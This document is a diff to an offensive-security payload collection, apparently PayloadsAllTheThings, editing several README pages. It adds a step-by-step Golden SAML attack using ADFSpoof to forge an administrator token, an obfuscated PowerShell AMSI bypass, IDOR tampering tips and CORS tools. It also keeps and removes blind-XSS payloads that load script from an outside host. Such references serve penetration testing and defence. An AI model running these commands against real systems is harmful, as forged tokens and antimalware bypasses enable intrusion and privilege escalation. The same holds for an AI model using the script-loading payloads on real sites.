ADFS Golden SAML

CORS Misconfiguration/README.md

@@ -11,9 +11,11 @@
 
 ## Tools
 
-* [Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
+* [s0md3v/Corsy - CORS Misconfiguration Scanner](https://github.com/s0md3v/Corsy/)
+* [chenjj/CORScanner - Fast CORS misconfiguration vulnerabilities scanner](https://github.com/chenjj/CORScanner)
 * [PostMessage POC Builder - @honoki](https://tools.honoki.net/postmessage.html)
 
+
 ## Prerequisites
 
 * BURP HEADER> `Origin: https://evil.com`

Insecure Direct Object References/README.md

@@ -6,14 +6,15 @@
 
 * [Tools](#tools)
 * [Exploit](#exploit)
+    * [IDOR Tips](#idor-tips)
 * [Examples](#examples)
 * [References](#references)
 
 ## Tools
 
-- Burp Suite plugin Authz
-- Burp Suite plugin AuthMatrix
-- Burp Suite plugin Authorize
+- [BApp Store > Authz](https://portswigger.net/bappstore/4316cc18ac5f434884b2089831c7d19e)
+- [BApp Store > AuthMatrix](https://portswigger.net/bappstore/30d8ee9f40c041b0bfec67441aad158e)
+- [BApp Store > Autorize](https://portswigger.net/bappstore/f9bbac8c4acf4aefa4d7dc92a991af2f)
 
 ## Exploit
 
@@ -43,6 +44,15 @@ The value of a parameter is used directly to access application functionality
 http://foo.bar/accessPage?menuitem=12
 ```
 
+### IDOR Tips
+
+* Change the HTTP request: POST → PUT
+* Change the content type: XML → JSON
+* Increment/decrement numerical values (1,2,3,..)
+* GUID/UUID might be weak
+* Transform numerical values to arrays: `{"id":19} → {"id":[19]}`
+
+
 ## Examples
 
 * [HackerOne - IDOR to view User Order Information - meals](https://hackerone.com/reports/287789)

Methodology and Resources/Active Directory Attack.md

@@ -86,6 +86,8 @@
       - [ESC9 - No Security Extension](#esc9---no-security-extension)
       - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
       - [Pass-The-Certificate](#pass-the-certificate)
+    - [Active Directory Federation Services](#active-directory-federation-services)
+      - [ADFS - Golden SAML](#adfs---golden-saml)
     - [UnPAC The Hash](#unpac-the-hash)
     - [Shadow Credentials](#shadow-credentials)
     - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
@@ -1592,6 +1594,8 @@ Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -
 
 > One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it.
 
+:warning: You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and `ManagedPasswordIntervalInDays`, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future.
+
 * Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA)
     ```ps1
     # Enumerate all gMSAs
@@ -2639,6 +2643,43 @@ [email protected] is allowed to enroll in the certificate template ESC9 that speci
   certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
   ```
 
+### Active Directory Federation Services
+
+#### ADFS - Golden SAML
+
+Requirements:
+* ADFS service account
+* The private key (PFX with the decryption password)
+
+Exploit:
+* Use [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) to dump ADFS informations
+* Convert PFX and Private key to binary format
+    ```ps1
+    # For the pfx
+    echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin
+    # For the private key
+    echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin 
+    ```
+* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof)
+    ```ps1
+    mkdir ADFSpoofTools
+    cd $_
+    git clone https://github.com/dmb2168/cryptography.git
+    git clone https://github.com/mandiant/ADFSpoof.git 
+    virtualenv3 venvADFSSpoof
+    source venvADFSSpoof/bin/activate
+    pip install lxml
+    pip install signxml
+    pip uninstall -y cryptography
+    cd cryptography
+    pip install -e .
+    cd ../ADFSpoof
+    pip install -r requirements.txt
+    python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin  -s adfs.pentest.lab  saml2 --endpoint https://www.contoso.com/adfs/ls
+    /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions '<Attribute Name="http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname"><AttributeValue>PENTEST\administrator</AttributeValue></Attribute>'
+    ```
+
+
 ### UnPAC The Hash
 
 Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.
@@ -4044,3 +4085,4 @@ CME          10.XXX.XXX.XXX:445 HOSTNAME-01   [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
 * [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
 * [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/)
 * [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability)
+* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/)

Methodology and Resources/Windows - AMSI Bypass.md

@@ -759,6 +759,15 @@ Add-Type -TypeDefinition $Winpatch -Language CSharp
 [patch]::it()
 ```
 
+## Other interesting AMSI bypass
+
+* [tihanyin/PSSW100AVB/AMSI_bypass_2021_09.ps1](https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1)
+    ```ps1
+    $A="5492868772801748688168747280728187173688878280688776828"
+    $B="1173680867656877679866880867644817687416876797271"
+    [Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " " ).GetField([string](38..51|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " ",'Non' + 'Public,Static').SetValue($null,$true)
+    ```
+
 ## AMSI.fail
 
 > AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/

Upload Insecure Files/README.md

@@ -23,8 +23,11 @@
 - [Burp > Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa)
 - [ZAP > FileUpload AddOn](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/)
 
+
 ## Exploits
 
+![file-upload-mindmap.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/Upload%20Insecure%20Files/Images/file-upload-mindmap.png?raw=true)
+
 ### Defaults extensions
 
 * PHP Server

XSS Injection/README.md

@@ -501,14 +501,9 @@ XSS Hunter is deprecated, it was available at [https://xsshunter.com/app](https:
 
 > XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.
 
-```javascript
-"><script src=//yoursubdomain.xss.ht></script>
-
-javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')
-
-<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script>
-
-<script>$.getScript("//yoursubdomain.xss.ht")</script>
+```xml
+"><script src=//<your.subdomain>.xss.ht></script>
+<script>$.getScript("//<your.subdomain>.xss.ht")</script>
 ```
 
 ### Other Blind XSS tools